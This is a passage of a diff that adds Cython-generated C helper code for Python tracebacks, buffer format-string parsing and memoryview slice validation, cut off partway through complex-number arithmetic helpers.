__pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +#if PY_MAJOR_VERSION < 3 +static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags) { + __Pyx_TypeName obj_type_name; + if (PyObject_CheckBuffer(obj)) return PyObject_GetBuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_array_type)) return __pyx_array_getbuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_memoryview_type)) return __pyx_memoryview_getbuffer(obj, view, flags); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' does not have the buffer interface", + obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return -1; +} +static void __Pyx_ReleaseBuffer(Py_buffer *view) { + PyObject *obj = view->obj; + if (!obj) return; + if (PyObject_CheckBuffer(obj)) { + PyBuffer_Release(view); + return; + } + if ((0)) {} + view->obj = NULL; + Py_DECREF(obj); +} +#endif + + +/* MemviewSliceIsContig */ +static int +__pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim) +{ + int i, index, step, start; + Py_ssize_t itemsize = mvs.memview->view.itemsize; + if (order == 'F') { + step = 1; + start = 0; + } else { + step = -1; + start = ndim - 1; + } + for (i = 0; i < ndim; i++) { + index = start + step * i; + if (mvs.suboffsets[index] >= 0 || mvs.strides[index] != itemsize) + return 0; + itemsize *= mvs.shape[index]; + } + return 1; +} + +/* OverlappingSlices */ +static void +__pyx_get_array_memory_extents(__Pyx_memviewslice *slice, + void **out_start, void **out_end, + int ndim, size_t itemsize) +{ + char *start, *end; + int i; + start = end = slice->data; + for (i = 0; i < ndim; i++) { + Py_ssize_t stride = slice->strides[i]; + Py_ssize_t extent = slice->shape[i]; + if (extent == 0) { + *out_start = *out_end = start; + return; + } else { + if (stride > 0) + end += stride * (extent - 1); + else + start += stride * (extent - 1); + } + } + *out_start = start; + *out_end = end + itemsize; +} +static int +__pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize) +{ + void *start1, *end1, *start2, *end2; + __pyx_get_array_memory_extents(slice1, &start1, &end1, ndim, itemsize); + __pyx_get_array_memory_extents(slice2, &start2, &end2, ndim, itemsize); + return (start1 < end2) && (start2 < end1); +} + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* IsLittleEndian */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void) +{ + union { + uint32_t u32; + uint8_t u8[4]; + } S; + S.u32 = 0x01020304; + return S.u8[0] == 4; +} + +/* BufferFormatCheck */ +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type) { + stack[0].field = &ctx->root; + stack[0].parent_offset = 0; + ctx->root.type = type; + ctx->root.name = "buffer dtype"; + ctx->root.offset = 0; + ctx->head = stack; + ctx->head->field = &ctx->root; + ctx->fmt_offset = 0; + ctx->head->parent_offset = 0; + ctx->new_packmode = '@'; + ctx->enc_packmode = '@'; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->is_complex = 0; + ctx->is_valid_array = 0; + ctx->struct_alignment = 0; + while (type->typegroup == 'S') { + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = 0; + type = type->fields->type; + } +} +static int __Pyx_BufFmt_ParseNumber(const char** ts) { + int count; + const char* t = *ts; + if (*t < '0' || *t > '9') { + return -1; + } else { + count = *t++ - '0'; + while (*t >= '0' && *t <= '9') { + count *= 10; + count += *t++ - '0'; + } + } + *ts = t; + return count; +} +static int __Pyx_BufFmt_ExpectNumber(const char **ts) { + int number = __Pyx_BufFmt_ParseNumber(ts); + if (number == -1) + PyErr_Format(PyExc_ValueError,\ + "Does not understand character buffer dtype format string ('%c')", **ts); + return number; +} +static void __Pyx_BufFmt_RaiseUnexpectedChar(char ch) { + PyErr_Format(PyExc_ValueError, + "Unexpected format string character: '%c'", ch); +} +static const char* __Pyx_BufFmt_DescribeTypeChar(char ch, int is_complex) { + switch (ch) { + case '?': return "'bool'"; + case 'c': return "'char'"; + case 'b': return "'signed char'"; + case 'B': return "'unsigned char'"; + case 'h': return "'short'"; + case 'H': return "'unsigned short'"; + case 'i': return "'int'"; + case 'I': return "'unsigned int'"; + case 'l': return "'long'"; + case 'L': return "'unsigned long'"; + case 'q': return "'long long'"; + case 'Q': return "'unsigned long long'"; + case 'f': return (is_complex ? "'complex float'" : "'float'"); + case 'd': return (is_complex ? "'complex double'" : "'double'"); + case 'g': return (is_complex ? "'complex long double'" : "'long double'"); + case 'T': return "a struct"; + case 'O': return "Python object"; + case 'P': return "a pointer"; + case 's': case 'p': return "a string"; + case 0: return "end"; + default: return "unparsable format string"; + } +} +static size_t __Pyx_BufFmt_TypeCharToStandardSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return 2; + case 'i': case 'I': case 'l': case 'L': return 4; + case 'q': case 'Q': return 8; + case 'f': return (is_complex ? 8 : 4); + case 'd': return (is_complex ? 16 : 8); + case 'g': { + PyErr_SetString(PyExc_ValueError, "Python does not define a standard format string size for long double ('g').."); + return 0; + } + case 'O': case 'P': return sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static size_t __Pyx_BufFmt_TypeCharToNativeSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(short); + case 'i': case 'I': return sizeof(int); + case 'l': case 'L': return sizeof(long); + #ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(PY_LONG_LONG); + #endif + case 'f': return sizeof(float) * (is_complex ? 2 : 1); + case 'd': return sizeof(double) * (is_complex ? 2 : 1); + case 'g': return sizeof(long double) * (is_complex ? 2 : 1); + case 'O': case 'P': return sizeof(void*); + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +typedef struct { char c; short x; } __Pyx_st_short; +typedef struct { char c; int x; } __Pyx_st_int; +typedef struct { char c; long x; } __Pyx_st_long; +typedef struct { char c; float x; } __Pyx_st_float; +typedef struct { char c; double x; } __Pyx_st_double; +typedef struct { char c; long double x; } __Pyx_st_longdouble; +typedef struct { char c; void *x; } __Pyx_st_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { char c; PY_LONG_LONG x; } __Pyx_st_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToAlignment(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_st_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_st_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_st_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_st_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_st_float) - sizeof(float); + case 'd': return sizeof(__Pyx_st_double) - sizeof(double); + case 'g': return sizeof(__Pyx_st_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_st_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +/* These are for computing the padding at the end of the struct to align + on the first member of the struct. This will probably the same as above, + but we don't have any guarantees. + */ +typedef struct { short x; char c; } __Pyx_pad_short; +typedef struct { int x; char c; } __Pyx_pad_int; +typedef struct { long x; char c; } __Pyx_pad_long; +typedef struct { float x; char c; } __Pyx_pad_float; +typedef struct { double x; char c; } __Pyx_pad_double; +typedef struct { long double x; char c; } __Pyx_pad_longdouble; +typedef struct { void *x; char c; } __Pyx_pad_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { PY_LONG_LONG x; char c; } __Pyx_pad_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToPadding(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_pad_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_pad_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_pad_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_pad_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_pad_float) - sizeof(float); + case 'd': return sizeof(__Pyx_pad_double) - sizeof(double); + case 'g': return sizeof(__Pyx_pad_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_pad_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static char __Pyx_BufFmt_TypeCharToGroup(char ch, int is_complex) { + switch (ch) { + case 'c': + return 'H'; + case 'b': case 'h': case 'i': + case 'l': case 'q': case 's': case 'p': + return 'I'; + case '?': case 'B': case 'H': case 'I': case 'L': case 'Q': + return 'U'; + case 'f': case 'd': case 'g': + return (is_complex ? 'C' : 'R'); + case 'O': + return 'O'; + case 'P': + return 'P'; + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +static void __Pyx_BufFmt_RaiseExpected(__Pyx_BufFmt_Context* ctx) { + if (ctx->head == NULL || ctx->head->field == &ctx->root) { + const char* expected; + const char* quote; + if (ctx->head == NULL) { + expected = "end"; + quote = ""; + } else { + expected = ctx->head->field->type->name; + quote = "'"; + } + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected %s%s%s but got %s", + quote, expected, quote, + __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex)); + } else { + __Pyx_StructField* field = ctx->head->field; + __Pyx_StructField* parent = (ctx->head - 1)->field; + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected '%s' but got %s in '%s.%s'", + field->type->name, __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex), + parent->type->name, field->name); + } +} +static int __Pyx_BufFmt_ProcessTypeChunk(__Pyx_BufFmt_Context* ctx) { + char group; + size_t size, offset, arraysize = 1; + if (ctx->enc_type == 0) return 0; + if (ctx->head->field->type->arraysize[0]) { + int i, ndim = 0; + if (ctx->enc_type == 's' || ctx->enc_type == 'p') { + ctx->is_valid_array = ctx->head->field->type->ndim == 1; + ndim = 1; + if (ctx->enc_count != ctx->head->field->type->arraysize[0]) { + PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %zu", + ctx->head->field->type->arraysize[0], ctx->enc_count); + return -1; + } + } + if (!ctx->is_valid_array) { + PyErr_Format(PyExc_ValueError, "Expected %d dimensions, got %d", + ctx->head->field->type->ndim, ndim); + return -1; + } + for (i = 0; i < ctx->head->field->type->ndim; i++) { + arraysize *= ctx->head->field->type->arraysize[i]; + } + ctx->is_valid_array = 0; + ctx->enc_count = 1; + } + group = __Pyx_BufFmt_TypeCharToGroup(ctx->enc_type, ctx->is_complex); + do { + __Pyx_StructField* field = ctx->head->field; + __Pyx_TypeInfo* type = field->type; + if (ctx->enc_packmode == '@' || ctx->enc_packmode == '^') { + size = __Pyx_BufFmt_TypeCharToNativeSize(ctx->enc_type, ctx->is_complex); + } else { + size = __Pyx_BufFmt_TypeCharToStandardSize(ctx->enc_type, ctx->is_complex); + } + if (ctx->enc_packmode == '@') { + size_t align_at = __Pyx_BufFmt_TypeCharToAlignment(ctx->enc_type, ctx->is_complex); + size_t align_mod_offset; + if (align_at == 0) return -1; + align_mod_offset = ctx->fmt_offset % align_at; + if (align_mod_offset > 0) ctx->fmt_offset += align_at - align_mod_offset; + if (ctx->struct_alignment == 0) + ctx->struct_alignment = __Pyx_BufFmt_TypeCharToPadding(ctx->enc_type, + ctx->is_complex); + } + if (type->size != size || type->typegroup != group) { + if (type->typegroup == 'C' && type->fields != NULL) { + size_t parent_offset = ctx->head->parent_offset + field->offset; + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = parent_offset; + continue; + } + if ((type->typegroup == 'H' || group == 'H') && type->size == size) { + } else { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + } + offset = ctx->head->parent_offset + field->offset; + if (ctx->fmt_offset != offset) { + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch; next field is at offset %" CYTHON_FORMAT_SSIZE_T "d but %" CYTHON_FORMAT_SSIZE_T "d expected", + (Py_ssize_t)ctx->fmt_offset, (Py_ssize_t)offset); + return -1; + } + ctx->fmt_offset += size; + if (arraysize) + ctx->fmt_offset += (arraysize - 1) * size; + --ctx->enc_count; + while (1) { + if (field == &ctx->root) { + ctx->head = NULL; + if (ctx->enc_count != 0) { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + break; + } + ctx->head->field = ++field; + if (field->type == NULL) { + --ctx->head; + field = ctx->head->field; + continue; + } else if (field->type->typegroup == 'S') { + size_t parent_offset = ctx->head->parent_offset + field->offset; + if (field->type->fields->type == NULL) continue; + field = field->type->fields; + ++ctx->head; + ctx->head->field = field; + ctx->head->parent_offset = parent_offset; + break; + } else { + break; + } + } + } while (ctx->enc_count); + ctx->enc_type = 0; + ctx->is_complex = 0; + return 0; +} +static PyObject * +__pyx_buffmt_parse_array(__Pyx_BufFmt_Context* ctx, const char** tsp) +{ + const char *ts = *tsp; + int i = 0, number, ndim; + ++ts; + if (ctx->new_count != 1) { + PyErr_SetString(PyExc_ValueError, + "Cannot handle repeated arrays in format string"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ndim = ctx->head->field->type->ndim; + while (*ts && *ts != ')') { + switch (*ts) { + case ' ': case '\f': case '\r': case '\n': case '\t': case '\v': continue; + default: break; + } + number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + if (i < ndim && (size_t) number != ctx->head->field->type->arraysize[i]) + return PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %d", + ctx->head->field->type->arraysize[i], number); + if (*ts != ',' && *ts != ')') + return PyErr_Format(PyExc_ValueError, + "Expected a comma in format string, got '%c'", *ts); + if (*ts == ',') ts++; + i++; + } + if (i != ndim) + return PyErr_Format(PyExc_ValueError, "Expected %d dimension(s), got %d", + ctx->head->field->type->ndim, i); + if (!*ts) { + PyErr_SetString(PyExc_ValueError, + "Unexpected end of format string, expected ')'"); + return NULL; + } + ctx->is_valid_array = 1; + ctx->new_count = 1; + *tsp = ++ts; + return Py_None; +} +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts) { + int got_Z = 0; + while (1) { + switch(*ts) { + case 0: + if (ctx->enc_type != 0 && ctx->head == NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + if (ctx->head != NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + return ts; + case ' ': + case '\r': + case '\n': + ++ts; + break; + case '<': + if (!__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Little-endian buffer not supported on big-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '>': + case '!': + if (__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Big-endian buffer not supported on little-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '=': + case '@': + case '^': + ctx->new_packmode = *ts++; + break; + case 'T': + { + const char* ts_after_sub; + size_t i, struct_count = ctx->new_count; + size_t struct_alignment = ctx->struct_alignment; + ctx->new_count = 1; + ++ts; + if (*ts != '{') { + PyErr_SetString(PyExc_ValueError, "Buffer acquisition: Expected '{' after 'T'"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + ctx->enc_count = 0; + ctx->struct_alignment = 0; + ++ts; + ts_after_sub = ts; + for (i = 0; i != struct_count; ++i) { + ts_after_sub = __Pyx_BufFmt_CheckString(ctx, ts); + if (!ts_after_sub) return NULL; + } + ts = ts_after_sub; + if (struct_alignment) ctx->struct_alignment = struct_alignment; + } + break; + case '}': + { + size_t alignment = ctx->struct_alignment; + ++ts; + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + if (alignment && ctx->fmt_offset % alignment) { + ctx->fmt_offset += alignment - (ctx->fmt_offset % alignment); + } + } + return ts; + case 'x': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->fmt_offset += ctx->new_count; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->enc_packmode = ctx->new_packmode; + ++ts; + break; + case 'Z': + got_Z = 1; + ++ts; + if (*ts != 'f' && *ts != 'd' && *ts != 'g') { + __Pyx_BufFmt_RaiseUnexpectedChar('Z'); + return NULL; + } + CYTHON_FALLTHROUGH; + case '?': case 'c': case 'b': case 'B': case 'h': case 'H': case 'i': case 'I': + case 'l': case 'L': case 'q': case 'Q': + case 'f': case 'd': case 'g': + case 'O': case 'p': + if ((ctx->enc_type == *ts) && (got_Z == ctx->is_complex) && + (ctx->enc_packmode == ctx->new_packmode) && (!ctx->is_valid_array)) { + ctx->enc_count += ctx->new_count; + ctx->new_count = 1; + got_Z = 0; + ++ts; + break; + } + CYTHON_FALLTHROUGH; + case 's': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_count = ctx->new_count; + ctx->enc_packmode = ctx->new_packmode; + ctx->enc_type = *ts; + ctx->is_complex = got_Z; + ++ts; + ctx->new_count = 1; + got_Z = 0; + break; + case ':': + ++ts; + while(*ts != ':') ++ts; + ++ts; + break; + case '(': + if (!__pyx_buffmt_parse_array(ctx, &ts)) return NULL; + break; + default: + { + int number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + ctx->new_count = (size_t)number; + } + } + } +} + +/* TypeInfoCompare */ + static int +__pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b) +{ + int i; + if (!a || !b) + return 0; + if (a == b) + return 1; + if (a->size != b->size || a->typegroup != b->typegroup || + a->is_unsigned != b->is_unsigned || a->ndim != b->ndim) { + if (a->typegroup == 'H' || b->typegroup == 'H') { + return a->size == b->size; + } else { + return 0; + } + } + if (a->ndim) { + for (i = 0; i < a->ndim; i++) + if (a->arraysize[i] != b->arraysize[i]) + return 0; + } + if (a->typegroup == 'S') { + if (a->flags != b->flags) + return 0; + if (a->fields || b->fields) { + if (!(a->fields && b->fields)) + return 0; + for (i = 0; a->fields[i].type && b->fields[i].type; i++) { + __Pyx_StructField *field_a = a->fields + i; + __Pyx_StructField *field_b = b->fields + i; + if (field_a->offset != field_b->offset || + !__pyx_typeinfo_cmp(field_a->type, field_b->type)) + return 0; + } + return !a->fields[i].type && !b->fields[i].type; + } + } + return 1; +} + +/* MemviewSliceValidateAndInit */ + static int +__pyx_check_strides(Py_buffer *buf, int dim, int ndim, int spec) +{ + if (buf->shape[dim] <= 1) + return 1; + if (buf->strides) { + if (spec & __Pyx_MEMVIEW_CONTIG) { + if (spec & (__Pyx_MEMVIEW_PTR|__Pyx_MEMVIEW_FULL)) { + if (unlikely(buf->strides[dim] != sizeof(void *))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly contiguous " + "in dimension %d.", dim); + goto fail; + } + } else if (unlikely(buf->strides[dim] != buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_FOLLOW) { + Py_ssize_t stride = buf->strides[dim]; + if (stride < 0) + stride = -stride; + if (unlikely(stride < buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + } else { + if (unlikely(spec & __Pyx_MEMVIEW_CONTIG && dim != ndim - 1)) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not contiguous in " + "dimension %d", dim); + goto fail; + } else if (unlikely(spec & (__Pyx_MEMVIEW_PTR))) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not indirect in " + "dimension %d", dim); + goto fail; + } else if (unlikely(buf->suboffsets)) { + PyErr_SetString(PyExc_ValueError, + "Buffer exposes suboffsets but no strides"); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_check_suboffsets(Py_buffer *buf, int dim, int ndim, int spec) +{ + CYTHON_UNUSED_VAR(ndim); + if (spec & __Pyx_MEMVIEW_DIRECT) { + if (unlikely(buf->suboffsets && buf->suboffsets[dim] >= 0)) { + PyErr_Format(PyExc_ValueError, + "Buffer not compatible with direct access " + "in dimension %d.", dim); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_PTR) { + if (unlikely(!buf->suboffsets || (buf->suboffsets[dim] < 0))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly accessible " + "in dimension %d.", dim); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_verify_contig(Py_buffer *buf, int ndim, int c_or_f_flag) +{ + int i; + if (c_or_f_flag & __Pyx_IS_F_CONTIG) { + Py_ssize_t stride = 1; + for (i = 0; i < ndim; i++) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not fortran contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } else if (c_or_f_flag & __Pyx_IS_C_CONTIG) { + Py_ssize_t stride = 1; + for (i = ndim - 1; i >- 1; i--) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not C contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } + return 1; +fail: + return 0; +} +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj) +{ + struct __pyx_memoryview_obj *memview, *new_memview; + __Pyx_RefNannyDeclarations + Py_buffer *buf; + int i, spec = 0, retval = -1; + __Pyx_BufFmt_Context ctx; + int from_memoryview = __pyx_memoryview_check(original_obj); + __Pyx_RefNannySetupContext("ValidateAndInit_memviewslice", 0); + if (from_memoryview && __pyx_typeinfo_cmp(dtype, ((struct __pyx_memoryview_obj *) + original_obj)->typeinfo)) { + memview = (struct __pyx_memoryview_obj *) original_obj; + new_memview = NULL; + } else { + memview = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + original_obj, buf_flags, 0, dtype); + new_memview = memview; + if (unlikely(!memview)) + goto fail; + } + buf = &memview->view; + if (unlikely(buf->ndim != ndim)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + ndim, buf->ndim); + goto fail; + } + if (new_memview) { + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (unlikely(!__Pyx_BufFmt_CheckString(&ctx, buf->format))) goto fail; + } + if (unlikely((unsigned) buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "u byte%s) " + "does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "u byte%s)", + buf->itemsize, + (buf->itemsize > 1) ? "s" : "", + dtype->name, + dtype->size, + (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->len > 0) { + for (i = 0; i < ndim; i++) { + spec = axes_specs[i]; + if (unlikely(!__pyx_check_strides(buf, i, ndim, spec))) + goto fail; + if (unlikely(!__pyx_check_suboffsets(buf, i, ndim, spec))) + goto fail; + } + if (unlikely(buf->strides && !__pyx_verify_contig(buf, ndim, c_or_f_flag))) + goto fail; + } + if (unlikely(__Pyx_init_memviewslice(memview, ndim, memviewslice, + new_memview != NULL) == -1)) { + goto fail; + } + retval = 0; + goto no_fail; +fail: + Py_XDECREF(new_memview); + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_ds_unsigned_char__const__(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_STRIDED) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, 0, + PyBUF_RECORDS_RO | writable_flag, 1, + &__Pyx_TypeInfo_unsigned_char__const__, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* MemviewDtypeToObject */ + static CYTHON_INLINE PyObject *__pyx_memview_get_nn___pyx_t_5numpy_uint8_t(const char *itemp) { + return (PyObject *) __Pyx_PyInt_From_npy_uint8(*(__pyx_t_5numpy_uint8_t *) itemp); +} +static CYTHON_INLINE int __pyx_memview_set_nn___pyx_t_5numpy_uint8_t(const char *itemp, PyObject *obj) { + __pyx_t_5numpy_uint8_t value = __Pyx_PyInt_As_npy_uint8(obj); + if (unlikely((value == ((npy_uint8)-1)) && PyErr_Occurred())) + return 0; + *(__pyx_t_5numpy_uint8_t *) itemp = value; + return 1; +} + +/* MemviewDtypeToObject */ + static CYTHON_INLINE PyObject *__pyx_memview_get_unsigned_char__const__(const char *itemp) { + return (PyObject *) __Pyx_PyInt_From_unsigned_char(*(unsigned char const *) itemp); +} + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return ::std::complex< float >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return x + y*(__pyx_t_float_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + __pyx_t_float_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real + b.real; + z.imag = 